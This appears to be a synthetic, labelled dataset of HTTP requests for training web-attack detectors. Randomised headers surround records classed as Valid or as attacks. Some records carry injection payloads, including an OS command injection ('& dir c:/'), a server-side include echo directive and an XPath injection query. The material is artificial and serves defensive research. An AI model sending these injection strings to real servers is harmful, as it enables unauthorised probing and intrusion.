GET /lEM9wKDQ2ebUQY/swuRdBsK9Wv/rXCeLBci3CPszpWCh/svaioenileil8yeieehi/4OZebIjqR-.gif?kCIetttxhInefn=5laa&eerr1t9=catiF&gnH=ay&sqcYoe9ciyilv=eh&Lot6cm=4rFLJ&mebbxsbm1=catrh+%29nra%5DquniongnxmlpassthruEn&w4xlDr2=45972692&s589o=iprocessing-instructiondsaysah6%5Drsamxu&inputG-IarcpkMiAVi=pmoE3hEbU0&fotyns=dk&yni6n5eofa0y=dx&Hla9alsw=eRhselect&igtoi=2786661&czlocationXT@p9u6=1366991&mi=http+ HTTP/1.1
Host: www.sAeatlat.ch
Connection: ac347ajc
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, identity;q=0.1, compress;q=0.7
Accept-Language: *;q=0.3
Cache-Control: min-fresh=0
Client-ip: 26.146.129.98
Cookie: th2etolptbDTn=obmaw9u3 cnclN=a;tmPsiibbntts=wheres]pacmivti+ohohd;evpelhntEf7Ewy=a\@ntfd?
Cookie2: $Version="203"
Date: Fri, 08 Dec 06 06:18:24 UTC
ETag: W/"n@EUvrKFmKhTAm_tQDw"
Expect: 100-continue
From: omsc@oihc6.biz
If-Modified-Since: Sat, 20 Mar 10 11:50:04 UTC
If-Unmodified-Since: Mon, 27 Oct 08 06:24:14 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 06
MIME-Version: 9.6
Pragma: htxeo='esu'
Proxy-Authorization: mntnor HgotSst=Rpgnni
Authorization: NTLM ekJhdTdvM21rYXIwYmE3cDQ2ZmxyZWZlaDFjTTdzYWVlbXh4UGU2
Range: -83593,-88
Referer: /a9szj5hs/smsui/K8ohs.dll
TE: trailers
Trailer: From
User-Agent: Mozilla/4.3 (Windows; U; Win 9x 1.0; sa-oi; rv:7.2.8) Gecko/96763599
UA-CPU: x86
UA-Disp: 626,6964,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 370x5547
Via: HTTP/7.0 94.199.111.87, atircn/4.8 84.34.153.208:938, 3.9 www.smiTI8.gif
Transfer-Encoding: deflate
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 385 66.29.237.87 "tWatMe1aWih2eBbet" 
X-Forwarded-For: 171.157.110.56
X-Serial-Number: 5303744983668
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27809
Start - Id: 20430
class: Valid
GET /el1Ou/ZJYfTzAj/sZXpg@@/tymS.png?i977=r&ndaEgdi=elpOC&winntIsvbscript=2161&b0ExtermEI6rLAD=0&na=3234179&Qcaljgf=64094&xmMo=nh3wedusew5&homebYhG=th9pcmX&taqiH=02790&rmfe0o5jrntlt=sahFeiyr%3Capoog%7E&9nRfSp=0031&myrnRgAr=%3CTe&5ls.eval0v-QqAO=tanAEldeRjfsing&fnoiazaosR=8eqlshaiRsitT5o5N&eerciwegEor=ng3 HTTP/1.1
Host: 6.71.64.75
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate, compress;q=0.7, deflate;q=0.1
Accept-Language: *;q=0.5
Cache-Control: max-stale=730
Client-ip: 138.229.4.76
Cookie: yLLF=847181153;Adnetn=saen s+2
Cookie2: $Version="63"
Date: Mon, 12 Apr 10 16:17:40 CET
ETag: W/"J5a8UxTuwAtRopVlERn"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Mon, 09 Oct 06 04:26:49 GMT
If-Unmodified-Since: Tue, 03 Aug 04 02:57:25 UTC
If-Match: "_F19zrgUwU_jq36dvDxx"
If-None-Match: "Pj.Aep2BcSE8Xh2A"
If-Range: *
Max-Forwards: 1106
MIME-Version: 9.4
Pragma: TtuwEe=hinu
Proxy-Authorization: tlst reIete=haAeP1te
Authorization: Digest algorithm=8wrlnobo
Range: 06141-
Referer: http://dttads.be/gtiae18h.pl
TE: deflate;q=0.0
Trailer: Pragma
User-Agent: itobsu/9.0.7.8.6
UA-CPU: 68000
UA-Disp: 241,776,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 720x338
Via: FTP/3.4 120.245.49.162, 9.8 231.203.57.37, 0.0 41.116.71.180:7794
Transfer-Encoding: compress
Upgrade: fwe/7.0
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 2843284
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20430
Start - Id: 13262
class: Valid
GET /Hn/doaOo/sc5RQL1OXEZ1/RQZOSV-TBe4isn/ttu7nghAQ._/nMlmc2x-eU.8p-.asp?tipDioeksdbh=Ejane&sySsSVnha3c=944&kn0oeroanhe=4 HTTP/1.0
Host: 150.255.203.82
Connection: close
Accept: */*;q=0.9
Accept-Charset: x-mac-cyrillic;q=0.3, iso-8859-6;q=0.6, koi8-r
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 102.185.236.34
Cookie: atonlopro65sud=4uN8tdn;Cb6M=202;rae9eh08b=niXwQOl
Cookie2: $Version="960"
Date: Thu, 28 Jun 07 20:35:18 CET
ETag: W/"IHhobgIcKInx@1uGfC"
Expect: oxIda=eu5R9Na;ypalmfe
From: Geng@tdt1lr9s.biz
If-Modified-Since: Sun, 11 Feb 07 14:23:08 GMT
If-Unmodified-Since: Sat, 30 Oct 04 14:27:54 CET
If-Match: "3XGYmyQjcubaRqxy"
If-None-Match: *
If-Range: Wed, 05 Jan 05 10:40:15 GMT
Max-Forwards: 7846
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: Basic eXdTM3RkdGI6d3hyZg==
Authorization: waqo eoyng=si0Rtt
Range: 219-
Referer: /agmqsk/nqhi.gif
TE: trailers
Trailer: Pragma
User-Agent: Mozilla/6.9 (Machintosh; U; PPC Mac OS X 5.9; lu-Mg; rv:8.4.1) Gecko/19508552
UA-CPU: MIPS
UA-Disp: 3770,9157,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2344x540
Via: FTP/9.5 249.138.30.4
Transfer-Encoding: deflate
Upgrade: nae/3.9, gd3t/0.5, seimar/6.1
Warning: 764 www.Zhr1sd.htm "u9u0" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 9425321413781535
----: -----------
~~~~~: ~~~~~~~~~~~

null

End - Id: 13262
Start - Id: 3015
class: Valid
GET /gTVMzzKkcHwKK/fhsoh4R87f8ekeos/56KqVra08s/eZmOjwTO/btkjf3p5rHM4.G1RY/eWIL6@eHH3T59e./IE/oyV.9/samdheatnbT6Deeept/ho/am54arrU/om4d6foumdivyuegeeom.php?rhsaf3rome=6&RnGe=n%24d%3D&dhwNno3Etenhb=e1Sec HTTP/1.1
Host: 252.36.179.230
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.8
Accept-Encoding: identity;q=0.2, gzip, gzip, compress, gzip
Accept-Language: *;q=0.8
Cache-Control: max-stale
Client-ip: 83.191.163.232
Cookie: b3r=61232995;z3fbknetcat=ettmGvnh;acr46wEgeoo6=bii0;hhh2hve36st=i
Cookie2: $Version="01"
Date: Sat, 14 Apr 07 20:17:18 UTC
ETag: "ich5aQFuHbDYovPHq"
Expect: Q2xtIRr=6kaR;acu0wur=e8heaott
From: Gnrp@qqtreOp.fr
If-Modified-Since: Wed, 12 Jan 05 03:58:04 UTC
If-Unmodified-Since: Tue, 29 Apr 08 14:04:57 CET
If-Match: "9AlxZ0CB4pbK1ONrRk2"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 1.8
Pragma: 0=teiho0mo
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: Digest response="cC0E4CfA8aaF4Fc841F0f2aF9bceb86d"
Range: 420-
Referer: http://6naod.be/teOnlnr.png
TE: trailers,chunked;q=0.0
Trailer: Upgrade
User-Agent: 6oh4tgt (evB3A1; hbgBTZqm8Q; wvDbW1WI)
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 918x116
Via: EIne/3.1 8.67.154.51
Transfer-Encoding: deflate
Upgrade: icylre/0.3, ln5p/0.1, f9at/0.4
Warning: 183 45.92.241.234 "I39o4nr0cToneodewlT" 
X-Forwarded-For: 34.221.232.228
X-Serial-Number: 32933233721
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3015
Start - Id: 44475
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.0
Host: www.troo.net:96296
Connection: keep-alive
Accept: audio/*;q=0.8
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.0
Accept-Language: reer-hutnhr;q=0.9, km-na, nc-wxfl0aj;q=0.8, 6yoza-iodin;q=0.5
Cache-Control: only-if-cached
Client-ip: 1.111.16.222
Cookie: Ynarent=aGlfyaR;etn=sppSjgi5A
Cookie2: $Version="38"
Date: Sat, 19 Apr 08 02:43:26 GMT
ETag: "W15-SZeMZOC6UIv"
Expect: nets=rpaui;afeisve8=e88t
From: bniw@mamjmaT.net
If-Modified-Since: Tue, 31 May 05 23:25:43 CET
If-Unmodified-Since: Fri, 25 Jul 08 13:35:25 GMT
If-Match: *
If-None-Match: "G3i8kwl2xodSAkFP"
If-Range: Fri, 20 May 05 24:16:58 CET
Max-Forwards: 286
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: Basic dHJsbjpoMnJuNmF5bg==
Range: 31467-04,46-
Referer: /rrrd8/Uevoa/shSrcew/oiteo5re.jsp
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: eres3byftxuauo1asms
UA-CPU: Sparc
UA-Disp: 970,105,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4559x569
Via: HTTP/7.0 229.21.102.43, o1lt8A/8.7 www.R9sre.jpg, 5.4 www.aviaki.js:75
Transfer-Encoding: gzip
Upgrade: tpEs/3.5, ser/9.6
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 73463
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44475
Start - Id: 10368
class: Valid
GET /ts6cllagOehcpsYum/lOkTny50aQ@O8CWFxx/68h/aCunionEMhSt8ZbX/eswk/JG68gxp_xmlprocessing-instruction.sh?rchtjeaSg6tl=oj&4dDrloispg=9yPl0WvHh&5ygoo=nEtde4s7ya HTTP/1.0
Host: www.4stlnuee.ch
Connection: keep-alive
Accept: audio/*
Accept-Charset: windows-1251, windows-1251;q=0.3, iso-10646-ucs-2;q=0.3, windows-874, windows-1252;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: er-ismasya5;q=0.3, il6b-ieJelR5Y;q=0.0
Cache-Control: min-fresh=642
Client-ip: 152.176.220.96
Cookie: sb0ss5ietdomv=575523
Cookie2: $Version="123"
Date: Thu, 05 Aug 04 18:27:50 GMT
ETag: "sByQXNmRkfJlEGc"
Expect: 100-continue
From: 5rOh@ndsafsvOY.ch
If-Modified-Since: Sun, 11 Dec 05 16:43:23 CET
If-Unmodified-Since: Tue, 23 Jan 07 21:36:48 GMT
If-Match: *
If-None-Match: "_k_yZFEnp0@15rzBc"
If-Range: Tue, 16 Mar 10 13:35:05 UTC
Max-Forwards: 6
MIME-Version: 3.9
Pragma: eiares=o0xter
Proxy-Authorization: Basic M2dkdDpyaWF0dGly
Authorization: tfuN4 sygnna=e8Gwlv
Range: 3188-815,-07
Referer: http://www.mtthrsan.net/nfgas.php
TE: gzip;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/4.3 (Windows; U; Windows NT 7.2; st-af; rv:7.4.9) Gecko/99008739
UA-CPU: 68000
UA-Disp: 329,0706,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 072x738
Via: HTTP/6.4 www.s5kahdH.tiff, HTTP/7.2 253.83.23.6
Transfer-Encoding: identity
Upgrade: 7heR/5.0
Warning: 627 www.brdRijj.html:96201 "nn2tlyihepU" "Mon, 21 Feb 05 15:12:00 GMT"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10368
Start - Id: 39332
class: SSI
GET /cF7hcareplaceL33p/TidshutdownD/joennyaFiphaehqlkg/4cmpjBUCZ6WZw.p.Lv_A/zpduWn/eZ/50nnenpt.pl?ijjod6=pp4osu5pZEp&asa2t5sienr8n=s&tln=bing&Qdb0R=qalneere&hiuoiensgabcd=21192394&rrhz=ehin1NZej9S&tclroegryeueivr=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&efdee4nH4eeoCa=stontdpassthrup3odwzE%7C&eWeetueromaun4l=65026&p0stnsQwjtmne=559 HTTP/1.1
Host: www.hnmi4hrebe.ch
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: iso-8859-5;q=0.8, windows-1250;q=0.0, windows-1253, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=71
Client-ip: 153.213.53.71
Cookie: odgoo=D1tfi;eeEn5xg2eSa=184788;ehr18=5869314189;rle= &Saoheh
Cookie2: $Version="998"
Date: Sun, 09 May 04 20:47:38 UTC
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Sat, 06 Nov 04 01:33:26 UTC
If-Unmodified-Since: Thu, 23 Apr 09 02:09:14 UTC
If-Match: "7EHT5aqp_Ma3GG_VDrdm"
If-None-Match: *
If-Range: Sat, 29 May 04 03:58:58 UTC
Max-Forwards: 440
MIME-Version: 5.7
Pragma: tt=d
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: NTLM c2RBb3NidXRhNmFlVHJ3c2Vlc1V4aG1kZGV4cm9Fb2Vxcg==
Range: -7892
Referer: /sn7ytpt1/en3ih6eb.mp3
TE: trailers,trailers
Trailer: From
User-Agent: pSzZYbqKH http://www.atsao.net
UA-CPU: x86
UA-Disp: 607,126,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: HTTP/6.0 123.127.180.111
Transfer-Encoding: compress
Upgrade: hsyn/7.1
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39332
Start - Id: 33486
class: Valid
PUT /1a0rtnlzikktI8t/rjhXo3fNw.C6/1qMN6wgetiinputGKCb.gif? HTTP/1.1
Content-Length: 33
Content-Language: nl2a,dyc7teNc,X3
Content-Encoding: identity
Content-Location: http://adtn0.it/ed3r.jsp
Content-MD5: aGFpdGVodEUxbmxzZWxrZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Jul 09 19:32:24 CET
Last-Modified: Sat, 26 Jan 08 23:58:37 CET
Host: 35.207.71.68
Connection: close
Accept: application/rtf
Accept-Charset: hz-gb-2312;q=0.1, gb2312;q=0.2, windows-1252;q=0.8, x-mac-chinesesimp;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=10899
Client-ip: 26.94.80.41
Cookie: ld9vydtcrcoOabo=7bhswieeFekitt;YTJQzzfMr5=235440498;nhoe=lnrymhaslsooa3execr;es35tt= fhtboot.inirrp343eze;2geooe8neetboA4=tyfabtbznqeEieoO
Cookie2: $Version="81"
Date: Wed, 14 May 08 12:44:42 UTC
ETag: "-.7kydcl6DWysFJLW"
Expect: 100-continue
From: wdp08E@ecUow0letw.uk
If-Modified-Since: Fri, 27 Jul 07 10:53:27 CET
If-Unmodified-Since: Fri, 24 Apr 09 15:21:02 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 072
MIME-Version: 9.7
Pragma: F5i=rrn3en1x
Proxy-Authorization: Basic b3dvYXg6ZXRkWnRscnM=
Authorization: Digest response="25f96a5A93c9FD43462C4CA3c6E4Feb9"
Range: -66
Referer: /cnsb/n9oeete/naoin1/5eojBdrt.gif
TE: trailers,chunked
Trailer: Range
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 5.4; Ot-a8; rv:9.2.4) Gecko/70785049
UA-CPU: MIPS
UA-Disp: 0089,4532,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 383x545
Via: rzoaf/3.5 www.xa4mO.tiff, 5.4 www.eoooN.html
Transfer-Encoding: deflate
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 302 www.t0ae.jpg "cwhessipntmfenker8" 
X-Forwarded-For: 210.113.185.220
X-Serial-Number: 179106
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5thgo=0~hg&jkunbaif=25255&9a=37

End - Id: 33486
Start - Id: 32146
class: Valid
GET /s90A/b0HtnvA3/a5oyU_i.c9/3LGRcyGWboot.ini/n5nph-H/etYh7-g0G6iphRS8.jpeg?BXM9pI.GLwOU=44&lml8tgs=hOfw%3DsamI&8248Tqh=imgxlitIeh6bae3O&8aseledlh48=o.QRejRF&tEaHegTnrw=2230&htse=30&98kBcopy1y9=PueeaaLimttn+&so=649&eaourfxtahhe=4Gz&ewloipmtnaEvsr0=%2Fd%2Ftex%3Faf%26hmse&pvarq9IAJx=+d%24 HTTP/1.1
Host: 196.124.104.156
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=712
Client-ip: 61.21.139.192
Cookie: @qaBHwKthN-6=fFlSWwTrQYR;eno1ansb=26;Tntt0hEyrgaryhn=0297308;h6nooauel=imia
Cookie2: $Version="0"
Date: Fri, 10 Jul 09 11:25:32 UTC
ETag: "CH.WFiPEwxl1KjUgSnC"
Expect: 100-continue
From: fcshsyfh@3ynaok.gov
If-Modified-Since: Tue, 12 Feb 08 05:05:22 CET
If-Unmodified-Since: Fri, 04 Sep 09 03:56:57 GMT
If-Match: "L67zD9Em-0OvaCpv7Gv"
If-None-Match: *
If-Range: Wed, 14 Apr 04 08:03:45 GMT
Max-Forwards: 5
MIME-Version: 9.3
Pragma: j='ca7zfcs'
Proxy-Authorization: Basic SWFpc0xSZTpvbmJlczZh
Authorization: Digest realm
Range: -3
Referer: http://www.knan.gov/auNigmDv.rar
TE: gzip;q=0.2,gzip,trailers
Trailer: From
User-Agent: Mozilla/7.1 (X11; U; Open BSD i386 4.9; tt-an; rv:3.4.5) Gecko/49890757
UA-CPU: PowerPC
UA-Disp: 3488,5746,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7140x9555
Via: 4.9 www.OXctrtEa.htm
Transfer-Encoding: compress
Upgrade: Ees/0.0, su1i/1.3
Warning: 953 85.108.253.61 "sa7gxeiapkth" 
X-Forwarded-For: 71.26.127.147
X-Serial-Number: 30016266128
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 32146
Start - Id: 35709
class: XPathInjection
GET /e@1TUF.ucyE/nsiesbiee/3S6XwJsL/sKnrznuE0R2j6nso/to9snsa/ui5yPbYwC2rXImejj/iinyaahi7a/gnSammheft/l_pm6mzg/SnEB0T/l5H--HKyl8h@ENYr/tA56S4g_Od734vz.js?1oory=wWzI9&smtplsa=206593&nhmrteiemmt=832&hOojo0eu4=mru&d8KiIu=aenblw%29rmpdocumentaDoNz&itnta8tk=ie&eateavnm3DIe=19987751&et0roiUtioepxs=es&ntN=%28i+++%3C+++count%28isso%2Fchild%3A%3Atext%28%29%29++++and++++j+++++%3C+++count%28ednco%2Fchild%3A%3Acomment%28%29%29+++++and++k+%3C+++++count%28t7n%2Fchild%3A%3A*%29+++%29&yo0tAawtn4sElo=2&9smrIoor1iiiino=%5Ctlocationt+&ssrp8=3SzX&QJNE_g68Vqf=94591640&hyHy=nTD2tA HTTP/1.0
Host: 69.87.202.97
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: identity;q=0.0
Accept-Language: *
Cache-Control: max-stale
Client-ip: 144.129.84.108
Cookie: imvexec7W=execaeinlybo;ro4wheayo=elhsscetodeinkEd1;waacoctreIRj9s=]t
Cookie2: $Version="64"
Date: Sun, 12 Feb 06 22:22:18 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Sun, 01 May 05 15:12:17 UTC
If-Unmodified-Since: Wed, 22 Feb 06 06:42:10 GMT
If-Match: "6rbTgf_XY9KDDxd"
If-None-Match: *
If-Range: Thu, 04 Aug 05 06:13:09 UTC
Max-Forwards: 7481
MIME-Version: 8.0
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Digest cnonce="N2rrnfo"
Authorization: Basic ZWRzeFRpaGI6dHNybWlw
Range: 5225-,8-9,1-
Referer: http://www.5shh5Itw.cz/iersrg4r/mto9d/ebb2rnm3.swf
TE: trailers,gzip;q=0.6
Trailer: User-Agent
User-Agent: eocei (op1Bbu; irPDrE_r; eexE4uP; ww3-BHA6; fdH-XLBv)
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: 2.5 www.onuth.jpeg
Transfer-Encoding: identity
Upgrade: acPhne/6.3, xettw/7.0
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35709
Start - Id: 22959
class: Valid
GET /odQ/in4MBmcWQppq8/abainlhl/hq5jlYqY3@QsS8nJe/h3ttni/9psBNT4netcatsMK72FW/sF5YvQQstYrMCaA/sDtlam/2jdGFo0YDpKgicyuz@.jsp?gaeveaoysh=ona8n62re7ar&qAoiho=n1t%7Cm&cn0setl=8es0t%3Byrmt38%40%3Eei%26e&0mdca4s=Ta%7E&dhBUr7tm=eeh2as8%28bce%7Coll&dl=odne&aptaWymihhdf7=lXXl%40Uv.J&xMdlhih5=gwL&eNsmgitsb=sau1&uygop4=ii_glEc963fl&ittw=Hegsgi HTTP/1.0
Host: 13.179.6.254
Connection: close
Accept: */*;q=0.8
Accept-Charset: iso-8859-2, windows-1252;q=0.8, us-ascii;q=0.5
Accept-Encoding: compress, gzip, compress;q=0.0, compress, deflate;q=0.2
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 140.119.82.68
Cookie: t6gonbhNj=eBP-Jum
Cookie2: $Version="359"
Date: Wed, 10 Mar 10 05:23:44 UTC
ETag: W/"PZN8hKm3JF19X2Y"
Expect: otsud
From: ap2o@ettoab6r.com
If-Modified-Since: Sun, 26 Oct 08 16:29:12 UTC
If-Unmodified-Since: Sun, 11 Mar 07 21:12:02 CET
If-Match: "rUYrwRDNfWdvWg@__6"
If-None-Match: *
If-Range: Sun, 04 Sep 05 07:26:33 CET
Max-Forwards: 50
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: Basic dHByY2xVOmxmZTFP
Authorization: Digest qop=auth-int
Range: 31732-,84218-
Referer: http://9m70.cz/clse/ncfrmt4n/reetuces/oTInli.gif
TE: trailers,gzip;q=0.6
Trailer: Pragma
User-Agent: oyune/3.5.4
UA-CPU: 68000
UA-Disp: 893,727,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 159x1338
Via: FTP/2.7 223.167.2.115, 5.8 www.jstds.htm, HTTP/1.8 194.114.153.156
Transfer-Encoding: compress
Upgrade: rnr2u/8.9, NBtv8d/1.1, cmOm1/0.6
Warning: 438 49.79.91.51:038 "rCeoI3u9lEt" "Sat, 30 Apr 05 03:17:12 GMT"
X-Forwarded-For: 208.109.201.230
X-Serial-Number: 08954851223
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22959
Start - Id: 24232
class: Valid
GET /sluadzhy/hYa7edtyxRsttr5seNv/tw6.C@@ixl.cfm?7iwgriwbatq=28455591&pN1A7tno2m=1&vlsdt=includeoysuinlho+mcmd%7Eregroup+by&Hhr=4534 HTTP/1.0
Host: 195.242.166.240
Connection: close
Accept: */*;q=0.1
Accept-Charset: hz-gb-2312, x-mac-chinesetrad
Accept-Encoding: deflate, deflate, compress
Accept-Language: rtrEl-elrmmev, nt-dn9gegd;q=0.9, hwmOmf-ganoe;q=0.3, 6eerqi0-7mgiwrm
Cache-Control: no-cache
Client-ip: 38.8.118.31
Cookie: update_exec_3iXj=r5:
Cookie2: $Version="00"
Date: Sat, 19 Jan 08 08:29:48 GMT
ETag: "36bzC1d_MvE69Aj.xtI"
Expect: 100-continue
From: s0hwns@eIpjfyve7i.ch
If-Modified-Since: Mon, 20 Jul 09 08:45:00 UTC
If-Unmodified-Since: Tue, 05 Apr 05 17:29:27 GMT
If-Match: "Ah_Xq-94NB93Bm2kC"
If-None-Match: "@9-.hYgteXGd1AJOzC5"
If-Range: Mon, 03 Jul 06 02:51:47 GMT
Max-Forwards: 6894
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest username="anyiee"
Range: -8088,1567-
Referer: http://www.ptdto.fr/n7dEs0co.php
TE: trailers
Trailer: If-None-Match
User-Agent: othRA5qq_ http://www.saot.be
UA-CPU: Sparc
UA-Disp: 431,4437,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 982x566
Via: 9.7 www.i2qli.jpeg:05080
Transfer-Encoding: compress
Upgrade: 0O9/0.3, eie/2.8, dasr/3.6
Warning: 335 157.183.177.154 "buOrqedamsso" "Thu, 14 Apr 05 06:20:30 GMT"
X-Forwarded-For: 190.104.194.11
X-Serial-Number: 58849092
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24232
Start - Id: 16049
class: Valid
GET /oMRoosrteartsyl9/3o2xHFIPxp_H2iRz-/.KJGuTFl/GzUbPXHHC/oecn7aeLflc/BDKscriptRpKOi337a/iHwtenxibnti/aaInnomrtshy0q/kH/ydWjJ@BM5R8SoeD9Cb/dKed1h5@zVRoSaNzbCy.msf? HTTP/1.0
Host: www.sogmsifuV.org:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 124.71.218.216
Cookie: l8wgetBdUSopeniexecb=63651255
Cookie2: $Version="71"
Date: Sun, 10 Dec 06 21:12:17 GMT
ETag: "Z5gkMjZc.n_FexmfUp"
Expect: 100-continue
From: nsodrd@t9uule.biz
If-Modified-Since: Thu, 25 Feb 10 11:24:45 CET
If-Unmodified-Since: Sat, 25 Oct 08 21:18:06 GMT
If-Match: "urDAmm7j_y5u_Dnk"
If-None-Match: *
If-Range: *
Max-Forwards: 75
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="neh7g"
Authorization: Basic dGZmaW46d2NyaWRidA==
Range: -94,681209-306844
Referer: http://www.oh3e.uk/eyo7e/donm8gh/tiyeteiw/nmzttea/aczro.avi
TE: trailers,deflate;q=0.0,trailers
Trailer: Cache-Control
User-Agent: wortoohcl (se9cPoh; nn-6Ypg; hnpB@k1lg; aXThD7K; dimKGhhLv)
UA-CPU: x86
UA-Disp: 738,0570,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0422x8842
Via: 5.8 0.123.112.30:1543
Transfer-Encoding: Anioo; eildxSc=dehnsrl
Upgrade: umjt/5.9
Warning: 293 www.aeei.tiff:0636 "t7sEtihfvebGdaitvu" 
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 0738318676103
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16049
Start - Id: 46787
class: XSS
PUT /r1rm/smheuotteg6okeQtrn/wz0VBUb.GtsDw-A/a9Ef/Elrigstdtf/ooqsabelosnaof9tey/amDMfSqGbohO/iDfmo/KHigvx/4nisoihoeeld/e_@bHB8E6.htm? HTTP/1.1
Content-Length: 264
Content-Language: tlp,eh,fhrSc
Content-Encoding: compress
Content-Location: http://www.dtnreF3.uk/s4tn.cfm
Content-MD5: ZE5hZ0NpbEV0bjhldWlyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 17 Jul 07 08:53:25 CET
Last-Modified: Fri, 12 Nov 04 12:19:06 GMT
Host: www.s4omaw.cz:80
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-5;q=0.3, windows-1253, x-mac-roman, x-mac-chinesesimp;q=0.6, euc-kr
Accept-Encoding: deflate
Accept-Language: tk6a4re9-7pstte;q=0.2, 8aeesotc-rstavi;q=0.2
Cache-Control: no-cache
Client-ip: 245.215.214.72
Cookie: llincen=likeoa5z;tTedonPco=hinlhiqb4eeydg;eac=xttLteti;28selu9AttcLjt=142767511
Cookie2: $Version="91"
Date: Fri, 31 Aug 07 10:29:53 GMT
ETag: W/"9ru54XN6zAHoJv82D"
Expect: 100-continue
From: fnwte@lpuewgs.de
If-Modified-Since: Sat, 13 Oct 07 14:17:48 UTC
If-Unmodified-Since: Mon, 31 Mar 08 23:58:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Dec 07 04:26:01 UTC
Max-Forwards: 80
